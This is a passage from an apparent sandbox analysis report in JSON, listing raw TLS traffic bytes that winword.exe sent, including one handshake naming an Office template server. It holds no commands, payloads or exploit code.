  501.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04l\\xd1\\x82q\\x8bkl6c\\x8e)\\xe3\\x9e\\xa8\\xa8\\x04\\xf8\\x08` \\x94#\\x18q\\x95b\\xebo\\x9cb\"\\xcf\\#w\\x7fm\r\\xc8\\xde\\x11o\\xde\\x1a*mlc91y\\xef@0\\x88zy\\xcb\\x80\\xed\n\\x81\\xef<\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000/9\\xb8y/\\x7fw9\\xf99\\xe0i\\xf4\\xa0\\x87c\\x08\\x8b\\xa94 b\\x03\\xd5\\xde\\xb2\\xd6\\xc5\\xa5t\\xcf-^\\xf6\\xfa<y\t\\xbe\\xbf\\x9f\\xa0\\xc6yw\\xebr\\xbe"
  502.             },
  503.             {
  504.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xa4(\\x19\\xdc\\xf4\\x886\\xe2\\xef\\x82x\\xbev\\x15\\xea!?9\\xd8\\xa1\\x1c\\xa3\\xfd\\xf9\\xff\\xe4\\x8d=\\x9c\\x18|&0\\xef\\xf6\\xc4gf\\xdc\\x19\\x10\\x9d\\xdc?w\\xa3\\xd8mxh\\xfb\\x88i\\xfd\\xd9px\\xd60\\xc5n\\x83r\\xff\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000|\\xf2p\\x9b\\xaf\\xe7\\x9en\\x1eb#\\x7fv>\\xbd\\xa9\\xf9o\\xc7i\\xbd\\xb0\ni\\x86o\\xd9tk\\xc8\\xf3\\xc0\\xb78\\xa7\\xf0\\xa1}tk\\x80c\\x87\\xd2\\x93\\xe4q1"
  505.             },
  506.             {
  507.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x044\\x89\\xd7\\xd0\\x1cls\\x8ej\\xe7\\xae|\\xfbt\\x1f2\\x0e&g4\\xb0l!\\xce\\xc0\\xea/\\xb4\\xc1\\xbe\\xb4>\\xdcnp\\xba\\xca\\xba\\x0b9\\xf9\\x9e\\xdf\\x89<5\\xea\\x01\\xae\\xb8\\x97\\x9e\\xeb|+\\xc0\\xc7l\\xe0\\xc4)s\\xa6\\xbe\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x1a0b\\x9a\\x9e\\xb3\\xed\\x03\\xd9f\\x9a_,\\xe4vlg\\xed\\xda\\x95\\xf1\\xdc\\xdb\\xbez9\\xa5\\xc7\\x8a\\xcf7\\x86\\x04\\xb82\\xfb\\x96\\x83\\xf5p\\xaas\\xeb\\xcc\\xba\\xc2\\xe9\\xf0"
  508.             },
  509.             {
  510.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010o:c\\xf09\\x19\\xdeo\\xbb\\xe9\\x1eg3\\xae\\x8b\\xf3m\\xd0\\xec&\\xaa\\xb4\\xf0\\xe0\\x8dl\\xaa~~\\xf9^\\xbd\\xc5\\xb3$f\\x97\\x98\\xc6e\\x80>\\x0e\\x1ccxy\\xa72:\\xbd[)\\xf4\\xcb\\xaf$b<k\\xe6\\x84\\xa9\\x82{\\x188v\\xd2^{\\x03\\x84f\\xff\\x05\\xcb\\x11\\x154\\xeau\\x85sz\\xcd\\xc81\\xd5\\xfb\\x9d\\xe3\\xae\\xd77m<x-v\"9jv\\xf1\\xbc\\x82v9z\\xde\\x8dr\\x1e\\x8ced\\xb9ba\\x19\\x97s!\\xd9\\x9f\\xd3\\xb0\\xdb\\xd8*\\x07\\x01\\xf2\\xa91\\x07\\x86\\x86:\\x9e4h\\x84\\xb8-6f\\xd7w\\x14\n,,\\x1f6\\x93h\\x9f\\xc4\\x81\\x93^\\xee\\xc3?\\xca\\x1b\\xe1<\\xbb\\xa6\\x10\\x9d-\\x8b\\x15\\xe3jm\\xba\\xf0\\x96\\xa2\\xae8\\xdb9[\\xc1\\x9c\\x03\\x02j\\xe2\\xd7\\xdd?\\x8aj\\x9e\\xd7\\xe1\\xe3\\xb1\\xa3{\\x94\\xd2\\xa7\\x1f\\xe6\\xe6jcb<j.\\x8f\\xb4\\x1d\\x88\\xb4\\x97\\x1d`e\\xdf*\\xf0=\\xa4s\"\\x8b\\xdaedk\\x0bb\\x99\\xee`-\\x995r\\x99\\x84"
  511.             },
  512.             {
  513.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x9c\\x14\\xcc\\xea\\x01\\xb2h\\xf5\\x16\\xc2p\\xf5\\x96\\x14\\xd7;\\x9c81\\xd7\\x9e\\xd3\\xc4\\xaa\\xcf\\xbc\\xb3\\x1c\\x05`1\\xba%h&\\xb4h\\x92\\xa4r.\r}\\xc6\\x95oh\\x96\\xf5\\x8f\\xb9\\x81\\x9b\\x95\\xce\\xfe\\xd1\\xd5\\xb8\\xe3\\xc7\\xf1-\\xba\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000bm=q\\x13\\xad\\xb6\\xb5\\xc4\\x9dz\\xcc\\x14\\x9f\\xe1\\xae\\x04\\xdf\\xd9\\xbd\\xd1pfu\\x0e\\x98\\x83\\x05\\xb2&v]\\xc8\\x94\\xd2\\x80\\x02\\xd3o5\\x0f\\x8d\\x18j}\\xc1\\x16\\xa9"
  514.             },
  515.             {
  516.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xe9put\\xc3\\xa6\\x180\\x19u\\xc1(\\x8b\\xfa1\\xc7snh|`u\\x01\\x0b\\x8an\\x11\\xf0\"\\xb0\r\\xed\\x0c,|t/\\x81s\\xa5\\xdd/\\x8e\\xaa%\\xe4\\xe3*\\xda\\xf0*+\\xb3\\xd6\\xdbw\\xa5\\xcez\\xe0\\x94\\x86\\xec\\x8e\\x85\\x9d\\xa3\\x80\\xf8h\\x9a\\xb96\\x8d\\x1c\\xd9\\x13\\x03\\xc8\\x11r\\xe8\"\\xdc\\x7f\\x16\\xd7\\xf4\\xado\\xca\\x01\\xc9\\xfa2=\\xb4)f\\xd7^\\x81\\xf2;jop\\xf2\\x04;\\xbb\\xcc\\x00\\xaflw\\x15\\x8c\\xd9b\\x89%\\x8bt\\xf0|-lr\\xd2\\xf9\\xcb\\x95\\xa2\\x91\\xe3-$c\\xfc\\xea\\x83v4\\xe2\\x85\\x81p\\xc5\\x0fm\\x94\n\\x92\\xf7\\x95\\xbc\\x9e\ry\\x85\\xccw\\x07\\xc7\\\\xbb\rw\\xcf\\x9e![/\\x1e@\\xe8\\x99\\x9f~\\xb8\\xddt\\xb8}$k\\xc9}\\xef\\xc9\\x08\\xdc3:\\xc2\\x06\\xc4\\xa1\\x02\\x85\\xc8\\xa5'\\xe3\\x00\\x0b\\x81m\\xd0+\\xad!\\x1b\\xdc\\x05l\\xb8o\\xfc\\xaf\\x8c\\xbd\\xf8'\\xdbt!vg\\xea\\xc4\\x9e\\x9b\\xa9\\xa9\\xc0b\\xdda\\xacjp^\\x98\\x00\\x1f\\xe9\\xbb\t\\xa5"
  517.             },
  518.             {
  519.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010{\\xe4h\\x82\\xa9\\xd2\\x86\\xc4\\xab\\xc2\\xd1\\xd9\\x9d\\x12\\xbf\\xd6\\xc9]\\x92\\x9d\\xbeo\\xdc\\x98c\\xe6\\xf9\\x9f\\x9b\\x00%\\xe7\\xaed\\x1f\\xaa\\xd8\\xac\\xa0\\xfcv\\x8elb\\x98\\x05\\x8c\\xe6\\xaf\\xf2\\xafke\\xd1\\xe7/\\xb1<\\xc2\\x16^u'\\x05c\\xda7[~}\\x0f\\xe4\\xd8ss\\xec#\\xa6'\\x0b\\x0c\\x82\\x9d\\x19\t\\x03\n*\\xefn\\x8b\\xd43\r\\x07\\xab-\\x81\\xa8\\xa6:\\xe3\\xf0\\x96\\xea>\\xe5\\x93\\xe8\\xaff\\xc2\\xb2\\xc7\\xb4\\x12\\xc155\\x89\\x0848x\\xe8!\\xb5\\x138\\x8b\\x80\\xeea\\x85~\\x01\\xb3f\\xbd\\xcettb\\xdd\\xc91g\\xc8^1\\x88k!\\x07\\xbc\\xaf^\\x04\\x97\\xac\\s\\xd2\\x08\\xad\\x15\\xe8e\\xd3\\x00n\\xe3\\xc3\\xb0\\xd6_k\\xc8\\xad\\x91\\x85\\xd1\\xc8\\x07\\xadw\\xe7a\\x12\\xb8w\\x08\\x94\\xbe\\x8e3c\\x18\\xac\\xf0\\xb1(\\xe5\\xd6\\xb0wwzbxg\\x9d\\xd6\\x84bh\\xbc>o\\xb8q\\xf0o\\xe6|m\\xeb~nsm\\x0f\\xd9\\x86,\\xb6\\xe7\\x8a\\x17\\xb4\\x89:\\x0c_\\xfcd\\x7f\\x02\\xfb\\x80>"
  520.             },
  521.             {
  522.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01]\t}\\x1f$k\\xff\\xdf*5\\x81\nn$d\\xe7\\x0c~(\\xcb\\xd5;\\x9a\\xf0\\x85&\\x80\\x91\\x0b\\x7f#}\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  523.             },
  524.             {
  525.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x8dh\nd\\xf4\\xdb\\x0b\\x0b_\\x86\\xe1\\xc8:\\xec\\xc7\\xa6\\x81\\xbb\\xfb\\xa1\\xf5\\x89;\\x91i\\xcb\\xcf\\x97:\\x9edn\\xd9&\\x1at\\xbc\\xd9\\xd0$\\xb6$\\xeb\\x96\\xc2\\xfd3`\\x12\\x9fa\r\\x08xbv\\xeb\\x8b>\\x14=\\xf9.\\xb8bj\\x16\\x9a\\xe0\\xf71;\\xbc\\xe7\\xb4\\xae\\xb0\\xfdd0@\\xbe\\x8c\\x0f\\x9b\\xcf,\\xd4\\x12x\\xc9>.i\\x17f\\x0bs\\x8b\\xa98:.\\xa4\\xd1\\x04\\xe8\\x92\\x87\\xceq}\\xaa\\xd2\\x88\\xeblk\\xfc\\x03%\\xb6d\\xad\\x91b\\xce\\x8e\\xf6\\xeb\\xe1f{\\xe6@v\\x96\\xcc-\\x00\\xd6s\\xad\\x91\\x91\\xaf\\x98\\xf0p#\\xf0#\\x9dfu\\xe6\\x11b\\xd4za\\x9c\\xd3\\xee\\x03\\xb6\\xaa\\x868\\xd43\\x9d\\xe0c\\xffzj\\xe4\\xfe\\xfd7ey\\xb9\\xc1\\xb7\\xda 0k\\xf4\\xc5>\\x07c\\xe4\\x80j\\xdbqz\\xa4\\xe6\\xd6o\\xba#h\\xa9\\xa44\\xf2ln\\x9c\\xaa\\xa3\\xb5\\x95\\x97\\xec\n\\xcc\\x9d\\x95pl\\xf1\\x1ci\\xa6\\xf8\\xae\\xa4\\x1e\\xdc\\x81(\\xd9}fl\\x87@\\xe1od\\xe0%i\\xf7"
  526.             },
  527.             {
  528.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xe14\\x07nx\\x94\\xcb\\xc8\\x89\\xd7l\\x84\\x85\\xd0mx\\xb5$c\\xfd4\\x13\\xa6a\\x94\\x14\\x93e\\x80~\\xa4)\\x0e\\xa1\\x1dx\\xf2#<\\xed9\\x9e\\xcd\ng\\xa5\\xbb6&\\xd5/7\\x188\\x1e\\x0c\\x1d\\xe7\\xef\\xa8n\\xdd\\x1f\\xf8\\xff\\xf3o\\x8ee\\xc2\\xbd\\x07f\nz\\x116-\\x8a\\xaam\\xfa\\x15\\xd1\\x06!\\xeb\\x0e\\xdb\\x98h2)\\x08\\xd8\\\\xec\\x98\\x9d\\x9a\\xf8\\xbc[\\xac'\\xcfkk\\xbb[v\\xb8\\xd0\\x01\\xc8\\x9an\\xbdg\\xfata\\x15\\xdf\\x0c\"\\x13\\x8e\\\\xb8a\\xcf\\xd6\\xca\\x8d\\xe9\\xeai*e\\xc6n\\x9f\\x89\\xc4\\xbd\\x91\\xc1\\xc0\\xe9mh\\xa6~ra}v\\x11b\r\\x88\r08\\x82\\xa6\\x12\\xeb\\xe6?\\x13(\\xe8\\x94-&7\\x0e\\xec\\x12\\x13\\xc9;\\x9a1^\\xcb}\\xcf\\xeb\\x8e\\xe7@\\xef\\xa3\\xf06\\x14\\x0e\\x13\\xae\\xb9\\xf2c\\xf9dm\\\\xe2*\\x88^\\x94\\xf04\\xc2\\x19[\\x94\\xfc\\xef\\x01\\xf4\\xa2c\\xe9\\xcd\\xa7}\\x17r\\xbc\\xf5)\\x98\\xb9\\xd6\\xa6\\xe0\\x14o\\xd5\\x885e\\xbd\\xe8\tq\\xbe"
  529.             },
  530.             {
  531.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010b@\r\\x8dj\\xdf\\xac\\x16l\\x11\\x8cv\\x19g\\xed\\xc8*\\xc3\\x16\\xcd\\xd7\\xec\\x98h\\x9fk\\x88\\xe0[\\xf6y\\x97s~o\\xad\\xee\\x88\\xe4\\xe2\\x10\\x1e\\\\xa4\\x88n\\xb2\\x8d\\xc9\\xa1\\xc1\\x01\\x89z\\x06\\x82\\xf4\\xd5\\x1d[\\x86\\xbb\\xb6\\x1e\\x06\\xf6\\xaf-\\x7f\\xcb\\xf5\\xe9\\xa0\\xc8k3\\xf8\\x1d\\x05c`\\xe2\\xd9c\\xa3\\x9d\\xad\\x87}\\x96\\xc7\\x8d\\xf7\\x1e\\xc3t\\x07\\xe5\\xabg$\\x94\\xf6f(o\\xadaawm\\xd6\\x7f\\xdeo\\xd1\\xd6m9\r\\xbd\\x16\\x9c&9\\xe6\\xd5\\xf4%\\xa3?\\xe7\n\\x02\\xe2d\\x8f\\x94\\xfc\\x9f\\x12\\x93\\x8a\\x96\\x7f$\\xe0|z\\xaf[0\\x05l\\x85\\x93\\x99x\\xd6`\\x04\\x0ey\\x02\\x1dh\\xdc+\\xa2u\\xe3\"\\x8a:n:\\x1e\\xe3\\x01\\xe5\\x14\\x02\\x8d$\\xb3\r\\xf2:#\\xbe~\\xbc\\xae\\xc1(\\x18\\xfb\\xf9\\xb4x\\xa4\\x177b\\xb7m\\xbe\\xccaw\\x9b\\xf7\\x13\\x089\\xb8\\xcf\\x88k\\xaay\\xf5|$\\xb6\\xa8\\x1a\\xa8w\\xe6\\x85w[\\xeb\\xc0\\xa7\\x1cn3g\\xef\\x93j`\\xb3\\x0f\\xfc'\\x15a2"
  532.             },
  533.             {
  534.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xf9\\x95\\x8c\\x16@4\\xc0\\xa1k\\xa6\\x92\\xc4\\x1ai:dc+[~\\xc4\\xe8p(\\xd9\\xa1u\\xb6>\\xea=\\xd0\\xe3qr\\x05`lx\\xcd\\xfai1\\xae\\xb4\\xf48\\xa2}\\xf1\\xda\\xc4$u\\xea\\xaf\\x94\\xe6n,\\\\x14\\x83\\x1a](\\xc8\\xec\\x02m\\xa9\\xc1rb\\xdd\\xf0\\xc1t\\xae:\\xac\\x12\\xca\\x00\\xd9,3\\xe7\\x06\\xfc2\\\\xe6,\\x86\\xa6\\x93;\\x0em\\x9e*d\\xb2\\x107u\\xfe\\xf8\\x14}?\\xc5\\xce\\xbf\\x0f\\xd1{\\xa8\\xc7xm\\x18 !\\xd9\\xc0\\x06f\\x94\\xe0g-0\\xf7cb\\x05\\xe1\\x98\\xfe\\x91\\xb5\\xa6\\x1d\\x7f\\xa9g\\xa1\\xfe\\xb1\\xcb:\\xa0\\xa0^\\x80\\xd7\\xf6\\xed\\x88\\xc8\\xf2`b\\xcd\\xbe\\xceh\\xe9\\xc0\\xf8\\xa1_\\x83\\xf9\\xe2\\x9e\\x11\\x84a%m]\\x84hs\\xd5\\x01\\xbdl\\x0b]\\xba_\\x8fi! \\xd2\\x08\\xac\\xc6z\\xf8\\xbfa$\\x86\\x0e\\xc2\\x9ei\\xc0\\xa7\\x0c\\x19\\x03\\xb0\\x03\\x05v\\x02\\xd0\\x86\\xde\\x85\\x97\\xddry$z\\x13\\x87\\x8a\\x82\\xcb\\xfb=-y\\xcfyg\\xb7\\x0e\\xd6\\xec\\xbb\\xc2"
  535.             },
  536.             {
  537.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xf48t\\xf0\\xca\\xa0\\x07\\xe2t0\"!=\\xff3\\x89\\xebm\\xb1\\xe0\\x93\\x10#\\xfb-\\x0c\\x07y\\xf5}\\x8d(\\xb9ey\\xb7%#o\\xb6\\xd9\\x81\\x9f\\xb2,9\\xb0\\xe4\\xd6i\\x94*(huk/\\xd4\\xa7\\x9ea\\x8b\\x04,\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xfckp\\xde\\x88\\xb9\\xf3\\xf6n\\xd3\\xde\\x99\\xa1\\x99\\x19\\x0b\\xe9\\xf0\\xc9\\x8b\\xa1\\xaen\\x98\\xeduo\\x10\\xcct\\x9f\\xeb\\x18s6n\\xbfae\\xc8i\r\\xa1\\xb8t\\xef\\x97\\x14"
  538.             },
  539.             {
  540.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x98\\x15igr\\x04\\x0b4\\xc7i%\\x00\\xc3m\\x1b\\xc4\\xe2cy8&\\xad^\\x06\\x9e\\x99k&\\xdd\\xb9\\xb7,\\xc4\\x05*o\tu\\xa0\\x83\\xd0j7o\\x1b\\xa6m\\xf5\\xce\\xc2\\xe4\\xac\\xca\\xed\\xd0hk\\xb7\\xba\\x12\\xd9\\xb0 y\\xf6yku~\\xdc\\xbdb\\x8c\\x1a\\xc7j \\x0c\\x9e\\xb2|\\xfc\\x8e\\x15oi\\x98\\xa7\\xe7\\xca\\x98\\x14)\\xd6jw\\x1ep\\xea\\xd6\\x91z\\xf3rg2&\\xe4\\xc1\\xc4\\x0b\\xbf\\x112\\x9c\\x8amou\\xc4\\x97\\x9da3\\xd0:\\xab\\x02v+:imo\\x07\\x02t_\\xcd\\xa3h\\xe6i>\\xf1\\xa2j\\x95ka\\xc7\\x08'\\xbd\\xda\\x1e\\xcf\\xe5\\xbe\\x90\\xb6\\x8cs$\\x93ak\\xc1\\xffr%\\xc7\\xcf\\xa6\\x92\\x19\\x88g>xa|\\x99\\x9b\\xab\\xe1\\x7f\\xec\\x83\\xdc\\xe7i\\x81xt\\x8ap\\xa2\\x848\\xb4\\x05\\xc0\\x86\\xc3\\xa2\\xa9\\x04\\xeb-\ru\\xcc\\x0c\\x1ed\\xa9 \r\n\\x90\\xa7\\x99\\xb3t\\x85\\xac\\x12\\xce\\xff\\x96\\x06c2\\xca\\x86\\xc4p\\xfc\\xd5\\x16]^\\x13iyh7\\x85m\\xc7"
  541.             },
  542.             {
  543.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\t\\xaf\\xa6n\\xd1\\x9b\\x98\\xb9\\xcfm\\xe4\\x10\\xb1\\xdd\\x1c\\x86\\xa8p\\xb1j\\x80{o\\xbb\\xf5q$\\xb3\\xeb\\x05\\xba\\xd5\\x03\\x9f\\xe1\\x85\\xb1\\x86\\xa8\\\\xca\\x8e\\x0ffa\\x00\\xd0\\x8b\\x1c\\xcb\\x95\\xfe\\xb2\\xfep\\x15\\xd8k{i\\xf4\\xcct\\xbd\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x82\\xd5f\\xf46og=\"j\\x99q\\xeb\\x91k=@\\xdb\\x0fg\\x91\\xe3*\\xdcz\\x868\\x94\\xe6\\xacsc\\xa7\\xb8\\x19\\xfc r\\xcc\\xfe8\\xb6d\n\\xa7\\xf6\\xb9\\x9e"
  544.             },
  545.             {
  546.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x08~\\x03m\\x13`\\x0bi\\xd2\\x04\\xe1}\\xa8\\xa0\\x8f\\x19\\xc8\\xc9\\x07.3u\\x06\\x90\\xe6\\xec\\x12\\x14\\xa5\\xba=\\x05j\\xfa\\x87\\x1fmo\\xdc\\xf1e\\x00\\xda\\x857\\xdcv\\x11\\xa0e\\x8d\\x1c\\x08\\xa9\\xfb$\\x8c\\xd6\\x80&\\x9d\n\\x9d\\x01\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000w\\x9d\\x84\\xe7\\x9c3\\x07\\x9a\\xf9fq\\xaez\\xf6\\x816+\\xd3\\x08\\xc54\\xd3\\x0f\\x92o\\xff\\x04\\xee\\xf4\\x13wc9\\x01\\xa4\\x14\\x07\\xf7+r\r\\xe2\\xa0.\\x0b\\xd0\\x8e\\xfb"
  547.             },
  548.             {
  549.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x13\\xb1\\xb1>%_\\xa6\\xac\\xb0r\\x00\\x1c\\x1d\\xaf\\x00\\x01\\x8d\\xbd\\xa1\\x98/\\xbc\\xacp\\x99n\\xa1^\\xc40\\xc4st*\\xaf('\\xb4\r\\xf3`\\x90\\x02}\\xb1\\x08\\xe5\\xe0\\x9ftu\\xe2v\\xde\\xdf|r\\x97\\x85\\x98\\x03\\xc7\\xac\\xd5\\x98\\xa8<\\x99s\\xce*\r'p)\\xc5\\x01\\xe8\\x10\\x16\\x81}\\xac(#-\\x16ce\\xd3\\x9a\\xd6\\xab5zh\\x9fy\\x92\\x0by\\xdc\\x98\\xfae\\xa7|\\xfa\\x84\\xec\\xd1\\xc8\\xec.\\xd1\\xe5\\xe4sg\\x82\\xce;u\\x15\\x98h\\xff?\\x9f+;\\x9e\\xaf\\x11\\xca\\x0b-\\xe6\\o\\x1f\\x8d%\\xf7\\\\x02\\x14\\xb4\\xeb\\x8cwh\\x85\\xd8kn\\xc3\\xa5:w\\x1c%\\xc6\\x18\\xc0i\\xeewpf\\x1b+x\\x17%y\\x9ed\\x87,\\xf6e\\xb7j\\x10\\xed\\xf9\\xd5\\xb7\\xde\\xf3\\xbd\\x9a'm\\xf3t\\xfas\n\\x1d\\xcb\\x8ca\\xe2~j\\xae\\x01\\xb8\\x19-\\xfd\r\\xa3\\xc0\\xfa\\xba\\x1a\\xf7@\\x97\\xb7m\\xfb\\xe0n\\xaa\\xd3\\x88\\xa1\\xd7\\x11\\xf3q$\\x10\\xe7\\xfd]>\\xdfu\\xd6\\xfa\\x86\r\\x9d\\xf8\\xef{"
  550.             },
  551.             {
  552.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010bh\\xda\\xbf\\xb7\\x80[\\xb0\\x18\\xf1\\xabu\\xdd[\\x13\\xcbd\\x11\\x1cc\\x7f\\xc5\\x83u\\xa3\\xd0<@?\\xa6\\xa1q\\xc1\\xae<\\x14\\xee7\\x9dx\\xb8\\xb6\\xd5\\xeb\\x1e\\xa8\\xd3x\\xcb9\\xc7\\xd9sd\\xae\\x12\\xfe\\x8er\\xf5n\\x18\\x94\\x98_\\xed\\xd3\\x11\\x997v\\xe4\\x94i\\xb1lm\\x15\\xa80\\xf1\\xfc<m\\xff\\x8f\\x82\\xe1no\\x06\\x84\\xc2\\x8c3ju\\xdcz[{\\x8c$t\\xbc\\xd6)ne\\x07\\xaf\\x1bi\\xec\\x9e\\xf4\\x96\\x05\\x89s\\xb9\\x8e\\xe0\\xd0\\x1b\\xf9\\xd5\\xd2e\\x1eh\\xce\\x1a\\xf6\\xf6\\xdd7\\x9c\\x8f\\x83\\x0e&m\\xfe\\x99\\xe9\\xaev\\xbb\\xad\\x87\r\\x13\\x88\\x08\\xc7\\x00\\xef\\xe8\\x91\\x9f\\x11\\xe0i\\xe5q\\x7f\\xf1=\\x1b\\xc6\\xd4\\xb0i=\\x93\\xbdrb\\xb9\\xbec{1x*\\xc6nu\\xea\\x97\\xeb\\x8e-\\xf6\\x03\\x8f\\x0b\\xe4\\x98\\x98\\x8cjb\\xb2\\xf5\\xec\\xda\\xafh\\xcd\\x8f\\xf9\\x8cwg\\xe6f\\xce\\xa6\\xc9\\xf2\\x9e\r*\\xb1$]^\\x04\\xaf\\xd7\\x15\\xcb\\xf4\\xc94\\xa04\\x99j@\\xddb\\x9d\\x9cs\\x9e\\xdbqk"
  553.             },
  554.             {
  555.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xcb\\xfe.'\\xdcpu\\xae\\x98=\\xd8\\xae\\x07\\xc1\\xdeq#0\\x08h\\x05+\\xff\\x0c\r\\xa0\\xddh\\xdd.\\x8b\\xe7\\xa4\\x02\\x01\\xca\\x81\\x97/t\\x92\\x7f\\xca\\x9f\\xbd\\xf7\\xcb\\xc4v\\xf6+m\\xba\\x8d\\x9d\\xf1\\x7f\\x935.\\xce\n{]\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xef\\x8be\\xdci\\xcf0[\\x90%\\xef{\\xabc\\x8ac\\xf8\\xb7\\xec\r\\xac\\xe2\\xa0\\xb2\\x88\\xf6_\\xf3\\x18_\\xfd\\xa1\\x83\\xbd\\xfb\\xa7\\xb08w\\x88&\\xad\\xdf\\x15\\x9e\\x1f\\x07\\x89"
  556.             },
  557.             {
  558.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x07\\x91wc\\x0e.\"v@c\\x1d`\\x9e\\x03g\\x94\\x95\\x98\\xf9<\\x03b\\xeb\r)\\xa5y\\xfe\\xd5\\xb0\\x1f\\xa2\\xd1\\x9c@\\x198\\xa8x\\xf3\\x11\\xaa\\xe1mj\\x08&\\xfb#\\xa5\\xb7\\xac\\xc1,\n\\x94\\xf7\\x13?\\xa9\\xd7\\x817]\\xca\\xff\\xc3\\xa9\\xd6\\x94\\x8a\\xf9r\\xda\\xb5g\\xabxm\\xa8\\x9e*\\xd6\\xab\\xfdu\\xb4\\xda9\\xf5& o\\xe6\\xb2}r\\xd8t\\xbb\\xcd\\x10umao\\x80x\\x93\\xa2\\x93\\x07\\x93\\xff\\xa7\\xd6\\xe1hc8\\xb0z\\xf2\\xfe\\xac\\xddee\\xea\\xa2\\x9c\\x131\\xc3?\\x07?q\\x93\\xf0w\\xdbg\\x9bo\\xd9j\\xe4%\\xa7,\\xaa\\xf7?\\xf9\\xa9\\xe1\\xb4w\\xce\\xff&\\xde\\xd0e\\x86\\xa7~\\xe6\\xa0\\x94\\xa9th\\xd1\\x94p\\xee\\xb5\\x95\\x90\\x82\\xb3\\xe8\\xda\\x0f1\\x9d\\xaf\\x81\\xd0\\xb5\\xfa\\xf0\\xe4\\xf4\\x15\\x19\\xc0#h`\\xe5\\x89\\v\\xcc<a^:\\xaa\\xde\\xe9\\xfa\\x80i,\\xdce\\xdd\\xec!\\xa3&\\xa9&\\xcb$e\"\\x17f\\xe2\\xe5\\x16\\x07\\x07\\x831\\xcc{\\x01\\xf9\\xa8q\\xde47\\xc8\\xea"
  559.             },
  560.             {
  561.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x0b>`\\x11\\xf0u\\xd5zl\\xc3\\xed\\x89t/6\\x88\\x0b0 \\x0e\\xd6\\x05\\x13\\x12\\x00<\\x10\\x87q{\\xb4d\\x11\\xa0\\x9b\\xb4\\x1c\\xe2\\x15\\x9f\\xa9\r\\xd7\\xbf\\xc72\\x8ap\\xa4)4\\x95\\x85\\x8e&i\\xd2a\\xc8\\xc8\\xa3\\xe0i\\xfd\\x159\\xdb\\xe6v\\x80\"\\xd4a\\x9d\\x88\\xb6\\x98s\\x9d\\xbaq\\xf2.\\x05\\xe7\\xe0%\\xf2\\xe6\\x97\\xe0\\x07\\x06\\x1ba\\xfc\\xf3\\xc2\\xff/\\xe4y\\x97\\xca\\x85.[\\x9a\\xaa\\x98\\xaddo\\xed\\xe9\\xe4zh\\xfd\\xf9\\xdc\\x19\\xda\\x96\\x06\\xf5nl\\xb6(\\xeb.\\x84\\xac\r\\xf5.\\x04\\x9ay\\xa6y\\x02l\\xbb\\xf7\\xb7\\x0c!\\x15\\xe3\\x06\\x98\ti40\\xee\\x19\\x05\\x83\\x01\\xe6\\x81y?*\\x06\\x8e%$\\xe8\\xfb\\xe8\\x14z\\xd5di<\\xda\\x86\\xd4\\xa4\\xfcwj\\xf1\\xa4l\\x99\\xa3\\x95q\\x03\\xcb\\xd99|\\xf2\\x91i:\\x0e\\xe8\\xf4\\x16\\x99\\x1e \\xbd\\x82\\xea\\xfe\\x07\\x1e\\xec+\\xbf(\\x02\\xb8\n\t\\xbb\\xf9\\xd1\\x8b\\xf9\\xd8 \\xba2b\\x9a|\\x14\\x99k\\x92\\xb3\n*\\xa9^\\xc7\\xbep{\\x155"
  562.             },
  563.             {
